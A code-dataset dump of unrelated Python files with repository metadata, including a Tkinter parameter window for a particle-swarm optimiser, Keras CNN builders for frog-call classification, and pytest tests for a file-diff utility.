label_text = 'OptimumMoveStyle:',
items = OPTMOVESTYLE_SELECTION,
menubutton_width = 15
)
self.menu1.setvalue(OPTMOVESTYLE_SELECTION[self.pso.optFunction.get_optMoveStyle()])
self.menu1.grid(row=2, columnspan=2)
self.menu2 = Pmw.OptionMenu (self.win,
labelpos = 'w',
label_text = 'UpdateStyle:',
items = UPDATESTYLE_SELECTION,
menubutton_width = 15
)
self.menu2.setvalue(UPDATESTYLE_SELECTION[self.pso.optFunction.get_updateStyle()])
self.menu2.grid(row=3, columnspan=2)
self.menu3 = Pmw.OptionMenu (self.win,
labelpos = 'w',
label_text = 'DetectionMethod:',
items = DETECTIONMETHOD_SELECTION,
menubutton_width = 15
)
self.menu3.setvalue(DETECTIONMETHOD_SELECTION[self.pso.get_detectionMethod()])
self.menu3.grid(row=4, columnspan=2)
self.menu4 = Pmw.OptionMenu (self.win,
labelpos = 'w',
label_text = 'ResponseMethod:',
items = RESPONSEMETHOD_SELECTION,
menubutton_width = 15
)
self.menu4.setvalue(RESPONSEMETHOD_SELECTION[self.pso.get_responseMethod()])
self.menu4.grid(row=5, columnspan=2)
# make s row of buttons
buttons = Pmw.ButtonBox(self.win)
buttons.grid(row= 6, columnspan=2, padx=10, pady=10)
buttons.add('Apply', command=self.apply)
buttons.add('Cancel', command=self.win.destroy)
class ParameterWindow_new:
win = None
param = None
e1 = None
e2 = None
menu1 = None
menu2 = None
menu3 = None
menu4 = None
moveFrequency = 0
moveDistance = 0.0
def show(self):
self.win.lift()
def apply(self):
self.pso.optFunction.set_moveFrequency(int(self.e1.get()))
self.pso.optFunction.set_moveDistance(float(self.e2.get()))
#self.optFunction.set_optMoveStyle(int(self.l1.curselection()[0]))
self.pso.optFunction.set_optMoveStyle(self.menu1.index(self.menu1.getvalue()))
self.pso.optFunction.set_updateStyle(self.menu2.index(self.menu2.getvalue()))
self.pso.set_detectionMethod(self.menu3.index(self.menu3.getvalue()))
self.pso.set_responseMethod(self.menu4.index(self.menu4.getvalue()))
self.win.destroy()
def __init__(self, master, psoParam):
self.win = Toplevel()
self.param = psoParam
label = Label(self.win, text="MoveFrequency")
label.grid(row=0)
self.moveFrequency = self.pso.optFunction.get_moveFrequency()
self.e1 = Entry(self.win)
self.e1.insert(END,str(self.moveFrequency))
self.e1.grid(row=0, column=1)
label = Label(self.win, text="MoveDistance")
label.grid(row=1)
self.moveDistance = self.pso.optFunction.get_moveDistance()
self.e2 = Entry(self.win)
self.e2.insert(END,str(self.moveDistance))
self.e2.grid(row=1, column=1)
# self.l1 = Listbox(self.win, selectmode=SINGLE, height=2 )
# for item in OPTMOVESTYLE_SELECTION:
# self.l1.insert(END, item)
# self.l1.select_set(self.optFunction.get_optMoveStyle())
# self.l1.activate(self.optFunction.get_optMoveStyle())
# self.l1.grid(row=2, column=1)
self.menu1 = Pmw.OptionMenu (self.win,
labelpos = 'w',
label_text = 'OptimumMoveStyle:',
items = OPTMOVESTYLE_SELECTION,
menubutton_width = 15
)
self.menu1.setvalue(OPTMOVESTYLE_SELECTION[self.pso.optFunction.get_optMoveStyle()])
self.menu1.grid(row=2, columnspan=2)
self.menu2 = Pmw.OptionMenu (self.win,
labelpos = 'w',
label_text = 'UpdateStyle:',
items = UPDATESTYLE_SELECTION,
menubutton_width = 15
)
self.menu2.setvalue(UPDATESTYLE_SELECTION[self.pso.optFunction.get_updateStyle()])
self.menu2.grid(row=3, columnspan=2)
self.menu3 = Pmw.OptionMenu (self.win,
labelpos = 'w',
label_text = 'DetectionMethod:',
items = DETECTIONMETHOD_SELECTION,
menubutton_width = 15
)
self.menu3.setvalue(DETECTIONMETHOD_SELECTION[self.pso.get_detectionMethod()])
self.menu3.grid(row=4, columnspan=2)
self.menu4 = Pmw.OptionMenu (self.win,
labelpos = 'w',
label_text = 'ResponseMethod:',
items = RESPONSEMETHOD_SELECTION,
menubutton_width = 15
)
self.menu4.setvalue(RESPONSEMETHOD_SELECTION[self.pso.get_responseMethod()])
self.menu4.grid(row=5, columnspan=2)
# make s row of buttons
buttons = Pmw.ButtonBox(self.win)
buttons.grid(row= 6, columnspan=2, padx=10, pady=10)
buttons.add('Apply', command=self.apply)
buttons.add('Cancel', command=self.win.destroy)
| 42.834146
| 116
| 0.544813
| 853
| 8,781
| 5.514654
| 0.126612
| 0.041667
| 0.061224
| 0.035714
| 0.868197
| 0.865221
| 0.865221
| 0.845451
| 0.845451
| 0.845451
| 0
| 0.028925
| 0.34643
| 8,781
| 204
| 117
| 43.044118
| 0.79073
| 0.128687
| 0
| 0.773333
| 0
| 0
| 0.061549
| 0.008754
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.026667
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0e1099e931c7f0a3de3ff2966c3376777a9fa83f
| 830
|
py
|
Python
|
tests/basics/bytes_large.py
|
geowor01/micropython
|
7fb13eeef4a85f21cae36f1d502bcc53880e1815
|
[
"MIT"
] | 7
|
2019-10-18T13:41:39.000Z
|
2022-03-15T17:27:57.000Z
|
tests/basics/bytes_large.py
|
geowor01/micropython
|
7fb13eeef4a85f21cae36f1d502bcc53880e1815
|
[
"MIT"
] | null | null | null |
tests/basics/bytes_large.py
|
geowor01/micropython
|
7fb13eeef4a85f21cae36f1d502bcc53880e1815
|
[
"MIT"
] | 2
|
2020-06-23T09:10:15.000Z
|
2020-12-22T06:42:14.000Z
|
b1 = b"long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes long bytes"
b2 = b"concatenated bytes" b"concatenated bytes" b"concatenated bytes" b"concatenated bytes" b"concatenated bytes" b"concatenated bytes" b"concatenated bytes" b"concatenated bytes" b"concatenated bytes" b"concatenated bytes" b"concatenated bytes" b"concatenated bytes" b"concatenated bytes" b"concatenated bytes" b"concatenated bytes" b"concatenated bytes"
print("PASS")
| 207.5
| 458
| 0.808434
| 135
| 830
| 4.97037
| 0.059259
| 0.549925
| 0.774963
| 1.073025
| 0.979136
| 0.979136
| 0.979136
| 0.979136
| 0.979136
| 0.979136
| 0
| 0.002813
| 0.143373
| 830
| 4
| 459
| 207.5
| 0.940928
| 0
| 0
| 0
| 0
| 0.333333
| 0.8929
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.333333
| 0
| 0
| 0
| 0.333333
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 14
|
2a26731073722172e47e874cd99286013f80c742
| 106
|
py
|
Python
|
samples/ack_irrelevants.py
|
nitish-awasthi/msiempy
|
e0b1f4d2f2e0c837708f32c5be841a572603b32c
|
[
"MIT"
] | 20
|
2019-06-12T00:30:17.000Z
|
2022-03-16T23:20:00.000Z
|
samples/ack_irrelevants.py
|
nitish-awasthi/msiempy
|
e0b1f4d2f2e0c837708f32c5be841a572603b32c
|
[
"MIT"
] | 49
|
2019-06-11T14:41:06.000Z
|
2022-02-22T21:46:40.000Z
|
samples/ack_irrelevants.py
|
nitish-awasthi/msiempy
|
e0b1f4d2f2e0c837708f32c5be841a572603b32c
|
[
"MIT"
] | 20
|
2019-06-10T14:38:59.000Z
|
2020-11-14T22:19:55.000Z
|
# Now at: https://github.com/mfesiem/ack-irrelevants-ips-alarms/blob/master/ack-irrelevants-ips-alarms.py
| 53
| 105
| 0.792453
| 17
| 106
| 4.941176
| 0.764706
| 0.333333
| 0.404762
| 0.547619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.037736
| 106
| 1
| 106
| 106
| 0.823529
| 0.971698
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2a506067881f3306976a96825de4d397c8724421
| 44
|
py
|
Python
|
project_specific/__init__.py
|
jonntd/PipelineTools
|
84412c2c2ce27de874afb6aa5d56fd94e12e4536
|
[
"BSD-2-Clause"
] | 5
|
2019-07-19T22:11:07.000Z
|
2022-02-15T02:02:51.000Z
|
project_specific/__init__.py
|
blueroseslol/PipelineTools
|
6ba3da17dcc97b7ef0c99f9ebbbf4c41516b31c0
|
[
"BSD-2-Clause"
] | null | null | null |
project_specific/__init__.py
|
blueroseslol/PipelineTools
|
6ba3da17dcc97b7ef0c99f9ebbbf4c41516b31c0
|
[
"BSD-2-Clause"
] | 3
|
2018-06-05T09:00:13.000Z
|
2020-04-27T14:13:44.000Z
|
import ns57
def _reload():
reload(ns57)
| 11
| 16
| 0.681818
| 6
| 44
| 4.833333
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114286
| 0.204545
| 44
| 4
| 16
| 11
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
aa5523d8ef6088fb089ab34ae2acfe955b799f8e
| 171
|
py
|
Python
|
boa3_test/test_sc/interop_test/runtime/ScriptContainer.py
|
hal0x2328/neo3-boa
|
6825a3533384cb01660773050719402a9703065b
|
[
"Apache-2.0"
] | 25
|
2020-07-22T19:37:43.000Z
|
2022-03-08T03:23:55.000Z
|
boa3_test/test_sc/interop_test/runtime/ScriptContainer.py
|
hal0x2328/neo3-boa
|
6825a3533384cb01660773050719402a9703065b
|
[
"Apache-2.0"
] | 419
|
2020-04-23T17:48:14.000Z
|
2022-03-31T13:17:45.000Z
|
boa3_test/test_sc/interop_test/runtime/ScriptContainer.py
|
hal0x2328/neo3-boa
|
6825a3533384cb01660773050719402a9703065b
|
[
"Apache-2.0"
] | 15
|
2020-05-21T21:54:24.000Z
|
2021-11-18T06:17:24.000Z
|
from typing import Any
from boa3.builtin import public
from boa3.builtin.interop.runtime import script_container
@public
def main() -> Any:
return script_container
| 17.1
| 57
| 0.789474
| 24
| 171
| 5.541667
| 0.583333
| 0.120301
| 0.225564
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013793
| 0.152047
| 171
| 9
| 58
| 19
| 0.903448
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| true
| 0
| 0.5
| 0.166667
| 0.833333
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
aa5961288069a2d5252aeba9832bd00333494052
| 6,930
|
py
|
Python
|
Project_FrogLossFunctionCNN_Aus/MyClass_python/deep_model_frog_activity.py
|
Frog-Analysis/Project_FrogLossFunctionCNN
|
c2a1d440d5eb45577f5e3b28b3d29ab42eb606df
|
[
"MIT"
] | null | null | null |
Project_FrogLossFunctionCNN_Aus/MyClass_python/deep_model_frog_activity.py
|
Frog-Analysis/Project_FrogLossFunctionCNN
|
c2a1d440d5eb45577f5e3b28b3d29ab42eb606df
|
[
"MIT"
] | null | null | null |
Project_FrogLossFunctionCNN_Aus/MyClass_python/deep_model_frog_activity.py
|
Frog-Analysis/Project_FrogLossFunctionCNN
|
c2a1d440d5eb45577f5e3b28b3d29ab42eb606df
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Sun Jan 24 20:31:02 2021
@author: Administrator
"""
from keras.models import Sequential
from keras.layers import Dense, Activation, Flatten, Dropout, MaxPooling1D, Conv1D, Concatenate
from tensorflow.compat.v1.keras.layers import CuDNNLSTM as LSTM
from keras.layers import Conv2D, MaxPooling2D, GlobalAveragePooling2D, ZeroPadding2D
# from keras.layers import Conv3D, MaxPooling3D, TimeDistributed
from keras.layers.normalization import BatchNormalization
#------------------------------------------------------------------------------#
def build_1D_CNN_model(feat_final, num_classes):
# build 1D CNN
#------#
model = Sequential()
model.add(Conv1D(filters=16, kernel_size=32, strides=2, input_shape = feat_final.shape[1:]))
model.add(BatchNormalization())
model.add(Activation("relu"))
model.add(MaxPooling1D(pool_size=2))
model.add(Dropout(0.2))
model.add(Conv1D(filters=32, kernel_size=16, strides=2))
model.add(BatchNormalization())
model.add(Activation("relu"))
model.add(MaxPooling1D(pool_size=2))
model.add(Dropout(0.2))
model.add(Conv1D(filters=64, kernel_size=8, strides=2))
model.add(BatchNormalization())
model.add(Activation("relu"))
model.add(MaxPooling1D(pool_size=2))
model.add(Dropout(0.2))
model.add(LSTM(128, return_sequences=True))
# model.add(CuDNNLSTM(128, return_sequences=True))
model.add(Flatten())
model.add(Dense(1000, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes, activation='softmax'))
model.summary()
return model
def build_1D_CNN_model_GAP(feat_final, num_classes):
# build 1D CNN
#------#
model = Sequential()
model.add(Conv1D(filters=16, kernel_size=32, strides=2, input_shape = feat_final.shape[1:]))
model.add(BatchNormalization())
model.add(Activation("relu"))
model.add(MaxPooling1D(pool_size=2))
model.add(Dropout(0.2))
model.add(Conv1D(filters=32, kernel_size=16, strides=2))
model.add(BatchNormalization())
model.add(Activation("relu"))
model.add(MaxPooling1D(pool_size=2))
model.add(Dropout(0.2))
model.add(Conv1D(filters=64, kernel_size=8, strides=2))
model.add(BatchNormalization())
model.add(Activation("relu"))
model.add(MaxPooling1D(pool_size=2))
model.add(Dropout(0.2))
model.add(LSTM(128, return_sequences=True))
# model.add(CuDNNLSTM(128, return_sequences=True))
model.add(GlobalAveragePooling2D())
model.add(Dense(1000, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes, activation='softmax'))
model.summary()
return model
def build_2D_CNN_model(feat_final, num_classes):
#------#
# build 2D CNN
model = Sequential()
model.add(Conv2D(32, (3, 3), input_shape = feat_final.shape[1:]))
model.add(Activation('relu'))
model.add(BatchNormalization())
model.add(ZeroPadding2D((1, 1)))
model.add(Conv2D(32, (3, 3)))
model.add(Activation('relu'))
model.add(BatchNormalization())
model.add(ZeroPadding2D((1, 1)))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
model.add(Dropout(0.2))
model.add(Conv2D(64, (3, 3)))
model.add(Activation('relu'))
model.add(BatchNormalization())
model.add(ZeroPadding2D((1, 1)))
model.add(Conv2D(64, (3, 3)))
model.add(Activation('relu'))
model.add(BatchNormalization())
model.add(ZeroPadding2D((1, 1)))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
model.add(Dropout(0.2))
model.add(Conv2D(128, (3, 3)))
model.add(Activation('relu'))
model.add(BatchNormalization())
model.add(ZeroPadding2D((1, 1)))
model.add(Conv2D(128, (3, 3)))
model.add(Activation('relu'))
model.add(BatchNormalization())
model.add(ZeroPadding2D((1, 1)))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
model.add(Dropout(0.2))
model.add(GlobalAveragePooling2D())
model.add(Dropout(0.2)) # add
model.add(Dense(1000))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes))
model.add(Activation('softmax'))
return model
def build_1D_2D_CNN_model(input1, input2, num_classes):
#------#
# build 1D CNN
input_ft = input1
input_ft = Conv1D(filters=16, kernel_size=32, strides=2)(input_ft)
input_ft = BatchNormalization()(input_ft)
input_ft = Activation("relu")(input_ft)
input_ft = MaxPooling1D(pool_size=2)(input_ft)
input_ft = Conv1D(filters=32, kernel_size=16, strides=2)(input_ft)
input_ft = BatchNormalization()(input_ft)
input_ft = Activation("relu")(input_ft)
input_ft = MaxPooling1D(pool_size=2)(input_ft)
input_ft = Conv1D(filters=64, kernel_size=8, strides=2)(input_ft)
input_ft = BatchNormalization()(input_ft)
input_ft = Activation("relu")(input_ft)
input_ft = MaxPooling1D(pool_size=2)(input_ft)
input_ft = LSTM(128, return_sequences=True)(input_ft)
# input_ft = CuDNNLSTM(128, return_sequences=True)(input_ft)
input_ft = Flatten()(input_ft)
#------#
# build 2D CNN
input_rd = input2
input_rd = Conv2D(32, (3, 3))(input_rd)
input_rd = Activation('relu')(input_rd)
input_rd = BatchNormalization()(input_rd)
input_rd = ZeroPadding2D((1, 1))(input_rd)
input_rd = Conv2D(32, (3, 3))(input_rd)
input_rd = Activation('relu')(input_rd)
input_rd = BatchNormalization()(input_rd)
input_rd = ZeroPadding2D((1, 1))(input_rd)
input_rd = MaxPooling2D(pool_size=(2, 2), strides=(2, 2))(input_rd)
input_rd = Dropout(0.2)(input_rd)
input_rd = Conv2D(64, (3, 3))(input_rd)
input_rd = Activation('relu')(input_rd)
input_rd = BatchNormalization()(input_rd)
input_rd = ZeroPadding2D((1, 1))(input_rd)
input_rd = Conv2D(64, (3, 3))(input_rd)
input_rd = Activation('relu')(input_rd)
input_rd = BatchNormalization()(input_rd)
input_rd = ZeroPadding2D((1, 1))(input_rd)
input_rd = MaxPooling2D(pool_size=(2, 2), strides=(2, 2))(input_rd)
input_rd = Dropout(0.2)(input_rd)
input_rd = Conv2D(128, (3, 3))(input_rd)
input_rd = Activation('relu')(input_rd)
input_rd = BatchNormalization()(input_rd)
input_rd = ZeroPadding2D((1, 1))(input_rd)
input_rd = Conv2D(128, (3, 3))(input_rd)
input_rd = Activation('relu')(input_rd)
input_rd = BatchNormalization()(input_rd)
input_rd = ZeroPadding2D((1, 1))(input_rd)
input_rd = MaxPooling2D(pool_size=(2, 2), strides=(2, 2))(input_rd)
input_rd = Dropout(0.2)(input_rd)
input_rd = Flatten()(input_rd)
#-----
out = Concatenate()([input_ft, input_rd])
out = Dense(1000, activation='relu')(out)
out = Dropout(0.5)(out)
out = Dense(num_classes, activation='softmax')(out)
return out
| 31.935484
| 96
| 0.65974
| 936
| 6,930
| 4.71688
| 0.087607
| 0.143148
| 0.08154
| 0.09513
| 0.855266
| 0.813364
| 0.807022
| 0.797961
| 0.769875
| 0.76376
| 0
| 0.053668
| 0.171861
| 6,930
| 216
| 97
| 32.083333
| 0.71563
| 0.070996
| 0
| 0.808219
| 0
| 0
| 0.019997
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027397
| false
| 0
| 0.034247
| 0
| 0.089041
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
aa962f3e768ea8057ce3757606c000477b84c768
| 138
|
py
|
Python
|
tests/utils.py
|
shizuku/dpln
|
d6f62e97073313a92ba492bbf1b9cd57842a8369
|
[
"MIT"
] | 3
|
2021-10-16T11:43:16.000Z
|
2021-10-31T13:32:04.000Z
|
tests/utils.py
|
shizuku/dpln
|
d6f62e97073313a92ba492bbf1b9cd57842a8369
|
[
"MIT"
] | null | null | null |
tests/utils.py
|
shizuku/dpln
|
d6f62e97073313a92ba492bbf1b9cd57842a8369
|
[
"MIT"
] | 1
|
2021-10-14T04:06:40.000Z
|
2021-10-14T04:06:40.000Z
|
import numpy as np
def np_feq(a: np.ndarray, b: np.ndarray, epsilon: float = 2e-15) -> bool:
return (np.abs(a - b) < epsilon).all()
| 23
| 73
| 0.630435
| 25
| 138
| 3.44
| 0.68
| 0.209302
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.027027
| 0.195652
| 138
| 5
| 74
| 27.6
| 0.747748
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
2ad0d2fafcbaa0dbe0ac361f3936d31d31ce9f85
| 85
|
py
|
Python
|
baobab/data_augmentation/__init__.py
|
aymgal/baobab
|
960ddbd55fc4391f2b857f2232af38c45c809ae8
|
[
"MIT"
] | 8
|
2019-09-11T15:11:57.000Z
|
2022-02-03T08:24:52.000Z
|
baobab/data_augmentation/__init__.py
|
aymgal/baobab
|
960ddbd55fc4391f2b857f2232af38c45c809ae8
|
[
"MIT"
] | 52
|
2019-08-29T00:39:11.000Z
|
2021-01-02T22:49:41.000Z
|
baobab/data_augmentation/__init__.py
|
aymgal/baobab
|
960ddbd55fc4391f2b857f2232af38c45c809ae8
|
[
"MIT"
] | 2
|
2019-09-26T23:38:47.000Z
|
2020-02-18T10:07:04.000Z
|
from .noise_lenstronomy import *
#from .noise_torch import *
#from .noise_tf import *
| 28.333333
| 32
| 0.776471
| 12
| 85
| 5.25
| 0.5
| 0.428571
| 0.47619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.129412
| 85
| 3
| 33
| 28.333333
| 0.851351
| 0.576471
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2d563b55a1baf9c052923e2146f09b7dc20f147a
| 5,967
|
py
|
Python
|
filediffs/filediffs_python/tests/test_filediffs.py
|
INWTlab/filediffs
|
38328ed325c76afdbcbe878792b67383ce30b782
|
[
"MIT"
] | null | null | null |
filediffs/filediffs_python/tests/test_filediffs.py
|
INWTlab/filediffs
|
38328ed325c76afdbcbe878792b67383ce30b782
|
[
"MIT"
] | 2
|
2020-06-24T12:14:24.000Z
|
2021-04-21T08:04:12.000Z
|
filediffs/filediffs_python/tests/test_filediffs.py
|
INWTlab/filediffs
|
38328ed325c76afdbcbe878792b67383ce30b782
|
[
"MIT"
] | null | null | null |
from pathlib import Path
from time import time
from filediffs.filediffs_python.filediffs import file_diffs
def test_file_diffs_are_created():
# arrange
fp1 = str(Path(__file__).parent / "data" / "file_1.txt")
fp2 = str(Path(__file__).parent / "data" / "file_2.txt")
# outfile path for cleanup
outfile_p_both = Path(__file__).parent / "lines_present_in_both_files.txt"
outfile_p_1 = Path(__file__).parent / "lines_present_only_in_file1.txt"
outfile_p_2 = Path(__file__).parent / "lines_present_only_in_file2.txt"
# act
file_diffs(
filename_1=fp1, filename_2=fp2,
outpath_lines_present_in_both_files=str(outfile_p_both),
outpath_lines_present_only_in_file1=str(outfile_p_1),
outpath_lines_present_only_in_file2=str(outfile_p_2),
verbose=False
)
# assert
assert outfile_p_both.exists()
assert outfile_p_1.exists()
assert outfile_p_2.exists()
lines_f1 = []
with open(outfile_p_1) as fcon1:
for line in fcon1:
lines_f1.append(bytes(line, "utf-8"))
lines_f2 = []
with open(outfile_p_2) as fcon2:
for line in fcon2:
lines_f2.append(bytes(line, "utf-8"))
lines_f_both = []
with open(outfile_p_both) as fconb:
for line in fconb:
lines_f_both.append(bytes(line, "utf-8"))
assert lines_f1 == [
b'"1";-0.0106417702666228;-0.0106417702666228;-0.0106417702666228;-0.0108214718366451;-0.0106417702666228;'
b'-0.0108214718366451\n',
b'"2";-0.0106417702666228;-0.0106417702666228;-0.0106417702666228;-0.0108214718366451;-0.0106417702666228;'
b'-0.0108214718366451\n',
b'"3";-0.0106417702666228;-0.0106417702666228;-0.0106417702666228;-0.0108214718366451;-0.0106417702666228;'
b'-0.0108214718366451\n',
b'"4";-0.0106417702666228;-0.0106417702666228;-0.0106417702666228;-0.0108214718366451;-0.0106417702666228;'
b'-0.0108214718366451\n',
b'"5";-0.0106417702666228;-0.0106417702666228;-0.0106417702666228;-0.0108214718366451;-0.0106417702666228;'
b'-0.0108214718366451\n',
b'"6";-0.0106417702666228;-0.0106417702666228;-0.0106417702666228;-0.0108214718366451;-0.0106417702666228;'
b'-0.0108214718366451\n',
b'"7";-0.0106417702666228;-0.0106417702666228;-0.0106417702666228;-0.0108214718366451;-0.0106417702666228;'
b'-0.0108214718366451\n',
b'"8";-0.0106417702666228;-0.0106417702666228;-0.0106417702666228;-0.0108214718366451;-0.0106417702666228;'
b'-0.0108214718366451\n',
b'"9";-0.0106417702666228;-0.0106417702666228;-0.0106417702666228;-0.0108214718366451;-0.0106417702666228;'
b'-0.0108214718366451\n',
b'"10";-0.0106417702666228;-0.0106417702666228;-0.0106417702666228;-0.0108214718366451;-0.0106417702666228'
b';-0.0108214718366451\n']
assert lines_f2 == [
b'"16";-0.00848124395493423;-0.00866091748760897;-0.00866091748760897;-0.00902026455295847;-0.009020264552'
b'95847;-0.00902026455295847\n',
b'"17";-0.00848124395493423;-0.00866091748760897;-0.00866091748760897;-0.00902026455295847;-0.009020264552'
b'95847;-0.00902026455295847\n',
b'"18";-0.00848124395493423;-0.00866091748760897;-0.00866091748760897;-0.00902026455295847;-0.009020264552'
b'95847;-0.00902026455295847\n',
b'"19";-0.00848124395493423;-0.00866091748760897;-0.00866091748760897;-0.00902026455295847;-0.009020264552'
b'95847;-0.00902026455295847\n',
b'"20";-0.00848124395493423;-0.00866091748760897;-0.00866091748760897;-0.00902026455295847;-0.009020264552'
b'95847;-0.00902026455295847\n']
assert lines_f_both == [
b'"V1";"V2";"V3";"V4";"V5";"V6"\n',
b'"11";-0.00848124395493423;-0.00866091748760897;-0.00866091748760897;-0.00902026455295847;'
b'-0.00902026455295847;-0.00902026455295847\n',
b'"12";-0.00848124395493423;-0.00866091748760897;-0.00866091748760897;-0.00902026455295847;'
b'-0.00902026455295847;-0.00902026455295847\n',
b'"13";-0.00848124395493423;-0.00866091748760897;-0.00866091748760897;-0.00902026455295847;'
b'-0.00902026455295847;-0.00902026455295847\n',
b'"14";-0.00848124395493423;-0.00866091748760897;-0.00866091748760897;-0.00902026455295847;'
b'-0.00902026455295847;-0.00902026455295847\n',
b'"15";-0.00848124395493423;-0.00866091748760897;-0.00866091748760897;-0.00902026455295847;'
b'-0.00902026455295847;-0.00902026455295847\n']
# acleanup
outfile_p_both.unlink()
outfile_p_1.unlink()
outfile_p_2.unlink()
def test_file_diffs_performance():
# arrange
fp1 = str(Path(__file__).parent / "data" / "file_1.txt")
fp2 = str(Path(__file__).parent / "data" / "file_2.txt")
# outfile path for cleanup
outfile_p_both = Path(__file__).parent / "lines_present_in_both_files.txt"
outfile_p_1 = Path(__file__).parent / "lines_present_only_in_file1.txt"
outfile_p_2 = Path(__file__).parent / "lines_present_only_in_file2.txt"
# act
start = time()
runtime_avg = []
for i in range(0, 10000):
start_loop = time()
file_diffs(
filename_1=fp1, filename_2=fp2,
outpath_lines_present_in_both_files=str(outfile_p_both),
outpath_lines_present_only_in_file1=str(outfile_p_1),
outpath_lines_present_only_in_file2=str(outfile_p_2),
verbose=False
)
runtime_avg.append(time() - start_loop)
runtime = time() - start
# asserts
# runtime for 10.000 times file diff of two files with each having 10 lines and 5 lines differ is < 20s
assert runtime < 30
# assert average is smaller than 20/10.000
assert sum(runtime_avg) / len(runtime_avg) <= 30 / 10000
# acleanup
outfile_p_both.unlink()
outfile_p_1.unlink()
outfile_p_2.unlink()
# __file__ = 'filediffs/tests/test_comparefiles.py'
| 43.875
| 115
| 0.690799
| 744
| 5,967
| 5.293011
| 0.159946
| 0.172676
| 0.137125
| 0.172676
| 0.805993
| 0.801168
| 0.788979
| 0.788979
| 0.788979
| 0.788979
| 0
| 0.44907
| 0.170773
| 5,967
| 135
| 116
| 44.2
| 0.346807
| 0.050109
| 0
| 0.441176
| 0
| 0.147059
| 0.50566
| 0.493102
| 0
| 0
| 0
| 0
| 0.078431
| 1
| 0.019608
| false
| 0
| 0.029412
| 0
| 0.04902
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
